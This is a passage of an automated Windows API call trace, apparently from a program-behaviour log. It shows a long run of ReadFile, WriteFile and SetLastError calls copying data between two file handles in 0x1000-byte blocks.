lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.921] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.921] SetLastError (dwErrCode=0x0) [0092.921] SetLastError (dwErrCode=0x0) [0092.921] SetLastError (dwErrCode=0x0) [0092.921] SetLastError (dwErrCode=0x0) [0092.921] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.922] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.922] SetLastError (dwErrCode=0x0) [0092.922] SetLastError (dwErrCode=0x0) [0092.922] SetLastError (dwErrCode=0x0) [0092.922] SetLastError (dwErrCode=0x0) [0092.922] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.922] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.922] SetLastError (dwErrCode=0x0) [0092.922] SetLastError (dwErrCode=0x0) [0092.922] SetLastError (dwErrCode=0x0) [0092.922] SetLastError (dwErrCode=0x0) [0092.922] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.922] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.923] SetLastError (dwErrCode=0x0) [0092.923] SetLastError (dwErrCode=0x0) [0092.923] SetLastError (dwErrCode=0x0) [0092.923] SetLastError (dwErrCode=0x0) [0092.923] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.923] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.923] SetLastError (dwErrCode=0x0) [0092.923] SetLastError (dwErrCode=0x0) [0092.923] SetLastError (dwErrCode=0x0) [0092.923] SetLastError (dwErrCode=0x0) [0092.923] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.923] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.923] SetLastError (dwErrCode=0x0) [0092.923] SetLastError (dwErrCode=0x0) [0092.923] SetLastError (dwErrCode=0x0) [0092.923] SetLastError (dwErrCode=0x0) [0092.923] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.924] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.924] SetLastError (dwErrCode=0x0) [0092.924] SetLastError (dwErrCode=0x0) [0092.924] SetLastError (dwErrCode=0x0) [0092.924] SetLastError (dwErrCode=0x0) [0092.924] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.924] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.924] SetLastError (dwErrCode=0x0) [0092.924] SetLastError (dwErrCode=0x0) [0092.924] SetLastError (dwErrCode=0x0) [0092.924] SetLastError (dwErrCode=0x0) [0092.924] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.924] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.924] SetLastError (dwErrCode=0x0) [0092.925] SetLastError (dwErrCode=0x0) [0092.925] SetLastError (dwErrCode=0x0) [0092.925] SetLastError (dwErrCode=0x0) [0092.925] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.925] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.925] SetLastError (dwErrCode=0x0) [0092.925] SetLastError (dwErrCode=0x0) [0092.925] SetLastError (dwErrCode=0x0) [0092.925] SetLastError (dwErrCode=0x0) [0092.925] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.925] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.926] SetLastError (dwErrCode=0x0) [0092.926] SetLastError (dwErrCode=0x0) [0092.926] SetLastError (dwErrCode=0x0) [0092.926] SetLastError (dwErrCode=0x0) [0092.926] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.926] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.926] SetLastError (dwErrCode=0x0) [0092.926] SetLastError (dwErrCode=0x0) [0092.926] SetLastError (dwErrCode=0x0) [0092.926] SetLastError (dwErrCode=0x0) [0092.926] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.927] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.927] SetLastError (dwErrCode=0x0) [0092.927] SetLastError (dwErrCode=0x0) [0092.927] SetLastError (dwErrCode=0x0) [0092.927] SetLastError (dwErrCode=0x0) [0092.927] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.927] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.927] SetLastError (dwErrCode=0x0) [0092.927] SetLastError (dwErrCode=0x0) [0092.927] SetLastError (dwErrCode=0x0) [0092.927] SetLastError (dwErrCode=0x0) [0092.927] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.927] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.928] SetLastError (dwErrCode=0x0) [0092.928] SetLastError (dwErrCode=0x0) [0092.928] SetLastError (dwErrCode=0x0) [0092.928] SetLastError (dwErrCode=0x0) [0092.928] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.928] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.928] SetLastError (dwErrCode=0x0) [0092.928] SetLastError (dwErrCode=0x0) [0092.928] SetLastError (dwErrCode=0x0) [0092.928] SetLastError (dwErrCode=0x0) [0092.928] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.928] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.928] SetLastError (dwErrCode=0x0) [0092.928] SetLastError (dwErrCode=0x0) [0092.928] SetLastError (dwErrCode=0x0) [0092.928] SetLastError (dwErrCode=0x0) [0092.928] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.929] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.929] SetLastError (dwErrCode=0x0) [0092.929] SetLastError (dwErrCode=0x0) [0092.929] SetLastError (dwErrCode=0x0) [0092.929] SetLastError (dwErrCode=0x0) [0092.929] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.929] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.929] SetLastError (dwErrCode=0x0) [0092.929] SetLastError (dwErrCode=0x0) [0092.929] SetLastError (dwErrCode=0x0) [0092.929] SetLastError (dwErrCode=0x0) [0092.929] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.929] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.930] SetLastError (dwErrCode=0x0) [0092.930] SetLastError (dwErrCode=0x0) [0092.930] SetLastError (dwErrCode=0x0) [0092.930] SetLastError (dwErrCode=0x0) [0092.930] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.930] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.930] SetLastError (dwErrCode=0x0) [0092.930] SetLastError (dwErrCode=0x0) [0092.930] SetLastError (dwErrCode=0x0) [0092.930] SetLastError (dwErrCode=0x0) [0092.930] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.930] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.930] SetLastError (dwErrCode=0x0) [0092.930] SetLastError (dwErrCode=0x0) [0092.930] SetLastError (dwErrCode=0x0) [0092.930] SetLastError (dwErrCode=0x0) [0092.930] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.931] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.931] SetLastError (dwErrCode=0x0) [0092.931] SetLastError (dwErrCode=0x0) [0092.931] SetLastError (dwErrCode=0x0) [0092.931] SetLastError (dwErrCode=0x0) [0092.931] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.072] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.072] SetLastError (dwErrCode=0x0) [0093.072] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.072] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.073] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.073] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.073] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.075] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.075] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.075] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.076] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.076] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.076] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.076] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.076] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.076] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.077] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.077] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.077] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.077] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.077] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.077] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.077] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.077] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.078] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.078] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.078] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.078] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.078] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.078] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.079] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.079] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.079] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.079] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.079] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.079] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.079] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.079] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.080] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.080] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.080] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.080] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, 